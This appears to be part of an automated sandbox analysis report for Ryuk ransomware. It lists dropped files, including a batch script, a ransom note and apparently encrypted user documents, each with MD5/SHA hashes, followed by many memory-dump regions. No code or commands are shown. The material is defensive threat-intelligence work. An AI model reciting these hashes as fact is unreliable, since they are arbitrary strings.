4bafbcbc4cbbda94d0a315a09176de0ce6872cf1d85113539a7b04ff2360efa1

SHA512
c5b8832097ab5e74a0c31cc243c98c6a2b9734da4eb6e25cfc28070529ff4b6d77de1e97388f188f00148cd8db32f3ea62dc86aa841d47e25da8d8dd2267061e

Download Submit
C:\users\Public\PUBLIC

Filesize
276B

MD5
c60821cc4336f6453f9dc5453d8f0b7d

SHA1
09719d9251a7ec8f4c809f4c4377ae48a1629d3a

SHA256
df506e1f6cba7dbcad75cebde8340000b3181409fa672f971825c2c06ec764a1

SHA512
6040d0b375ecc727f62a044289d6218c39deb2395e7c4fd15d8e026654a38bb59df01440c1a9efd49b6c1e8d421cab2eff6c1c71f5927f87be0a523639398a64

Download Submit
C:\users\Public\UNIQUE_ID_DO_NOT_REMOVE

Filesize
1KB

MD5
f22186973841401a70277250dbeef346

SHA1
34cca504a460a77da3b937c85f6dd8ea64e4dea1

SHA256
1de15421cf2aecb17166b630867ba5a9718e3825e0b29847244c24e124de961d

SHA512
7ec83d04a5e14099cbbfaf50d5c38488753bff3f446bd3331f0b39b6e55fcd7937472fb6c5c1dced0a310e052909b8e4faf1a70a151e04e07099e7ee6c00a34b

Download Submit
C:\users\Public\window.bat

Filesize
1KB

MD5
d2aba3e1af80edd77e206cd43cfd3129

SHA1
3116da65d097708fad63a3b73d1c39bffa94cb01

SHA256
8940135a58d28338ce4ea9b9933e6780507c56ab37a2f2e3a1a98c6564548a12

SHA512
0059bd4cc02c52a219a0a2e1836bf04c11e2693446648dd4d92a2f38ed060ecd6c0f835e542ff8cfef8903873c01b8de2b38ed6ed2131a131bdd17887c11d0ec

Download Submit
F:\RyukReadMe.txt

Filesize
1KB

MD5
1e5d393290c87f1ccc62a1d3f89caf47

SHA1
87e6f98deeca6ed2ff27e7bfe8dd306b09bab088

SHA256
5971bf3131a292583967ee2ff687e7bf135930fe2bf5df76c6058852abdb7ace

SHA512
8a31e7240e0f52a02c73f8e83a7e8e749c035f773ba00474a7e35cb420a8b5ff1bf986fc3ff7831105d8bcab07c6a3c7f8af076623ab71b4216e33e916eb260e

Download Submit
\??\c:\Program Files\BackupUnprotect.mpv2

Filesize
591KB

MD5
a3708610d8647ad37c6063c6383b8654

SHA1
0409e97b8ba556708933f5fe3c94f1471d1b41f2

SHA256
e35aa51881f7141589c925bc43553588829d508953de32f88db5c2777110df91

SHA512
df375dc205822a1b692de70511f322e90208c7fb2ddae1d628afc759523e70b26ef404c81f5c36c89db718d6e15a061e2229f4a5527f6f858736a70c4bbef942

Download Submit
\??\c:\Users\Admin\Documents\BackupMove.vsd

Filesize
870KB

MD5
3cb27860ec62c19be9d4f1ee947e0844

SHA1
be83c0fe2114921c979fa09c651b2c6455af847d

SHA256
ade0a213a45f04d9634751945b97a23c5615eca81222f524199d3bf330db6789

SHA512
74bc0d8e99ca8d5fbd4517ca2a7dff8cfa69bd436296b73a9dcbec7d3eb1907e09d033f9bf0f5e6e84834f9d5a8815d510d78c68c01baf9e817d64c865dfdf85

Download Submit
memory/2764-36267-0x00007FF6D3980000-0x00007FF6D39B6000-memory.dmp

Filesize
216KB

Download
memory/2764-0-0x00007FF6D3980000-0x00007FF6D39B6000-memory.dmp

Filesize
216KB

Download
memory/2900-36268-0x00007FF6D3980000-0x00007FF6D39B6000-memory.dmp

Filesize
216KB

Download
memory/3792-36405-0x00000151E2530000-0x00000151E2538000-memory.dmp

Filesize
32KB

Download
memory/3792-36276-0x00000151E2260000-0x00000151E2268000-memory.dmp

Filesize
32KB

Download
memory/3792-36274-0x00000151E2260000-0x00000151E2261000-memory.dmp

Filesize
4KB

Download
memory/3792-36879-0x00007FF6D3980000-0x00007FF6D39B6000-memory.dmp

Filesize
216KB

Download
memory/3792-36277-0x00000151DE3D0000-0x00000151DE3D1000-memory.dmp

Filesize
4KB

Download
memory/3792-36536-0x00000151E2500000-0x00000151E2508000-memory.dmp

Filesize
32KB

Download
memory/3792-36319-0x00000151DFFD0000-0x00000151DFFE0000-memory.dmp

Filesize
64KB

Download
memory/3792-36328-0x00000151E2260000-0x00000151E2268000-memory.dmp

Filesize
32KB

Download
memory/3792-36313-0x00000151DE2E0000-0x00000151DE2F0000-memory.dmp

Filesize
64KB

Download
memory/3792-36271-0x00000151E23B0000-0x00000151E23B1000-memory.dmp

Filesize
4KB

Download
memory/3792-36270-0x00000151E2420000-0x00000151E2428000-memory.dmp

Filesize
32KB

Download
memory/3792-36537-0x00000151E24D0000-0x00000151E24D1000-memory.dmp

Filesize
4KB

Download
memory/3792-36273-0x00000151E2270000-0x00000151E2278000-memory.dmp

Filesize
32KB

Download
memory/3944-166-0x00007FF6D3980000-0x00007FF6D39B6000-memory.dmp

Filesize
216KB

Download
memory/3988-36578-0x00007FF6D3980000-0x00007FF6D39B6000-memory.dmp

Filesize
216KB

Download
memory/4012-36527-0x00007FF6D3980000-0x00007FF6D39B6000-memory.dmp

Filesize
216KB

Download
memory/4408-36562-0x00007FF6D3980000-0x00007FF6D39B6000-memory.dmp

Filesize
216KB

Download
memory/11944-36882-0x00000000043B0000-0x00000000043B1000-memory.dmp

Filesize
4KB

Download
memory/12664-36884-0x000001FBC4F60000-0x000001FBC5060000-memory.dmp

Filesize
1024KB

Download
memory/17936-36608-0x00000288052B0000-0x00000288052D0000-memory.dmp

Filesize
128KB

Download
memory/17936-36590-0x0000028804500000-0x0000028804600000-memory.dmp

Filesize
1024KB

Download
memory/17936-36591-0x0000028804500000-0x0000028804600000-memory.dmp

Filesize
1024KB

Download
memory/17936-36595-0x00000288052F0000-0x0000028805310000-memory.dmp

Filesize
128KB

Download
memory/17936-36626-0x00000288058C0000-0x00000288058E0000-memory.dmp

Filesize
128KB

Download
memory/22300-36588-0x0000000004640000-0x0000000004641000-memory.dmp

Filesize
4KB

Download
memory/26836-36351-0x0000000004540000-0x0000000004541000-memory.dmp

Filesize
4KB

Download
memory/27324-36369-0x0000021D1C6A0000-0x0000021D1C6C0000-memory.dmp

Filesize
128KB

Download
memory/27324-36379-0x0000021D1CAB0000-0x0000021D1CAD0000-memory.dmp

Filesize
128KB

Download
memory/27324-36353-0x0000021D1B700000-0x0000021D1B800000-memory.dmp

Filesize
1024KB

Download
memory/27324-36358-0x0000021D1C6E0000-0x0000021D1C700000-memory.dmp

Filesize
128KB

Download
memory/29672-36747-0x0000000004610000-0x0000000004611000-memory.dmp

Filesize
4KB

Download
memory/30124-36753-0x000002D2E1720000-0x000002D2E1740000-memory.dmp

Filesize
128KB

Download
memory/30124-36755-0x000002D2E1D00000-0x000002D2E1D20000-memory.dmp

Filesize
128KB

Download
memory/30124-36754-0x000002D2E16E0000-0x000002D2E1700000-memory.dmp

Filesize
128KB

Download
memory/30124-36748-0x000002D2E0800000-0x000002D2E0900000-memory.dmp

Filesize
1024KB

Download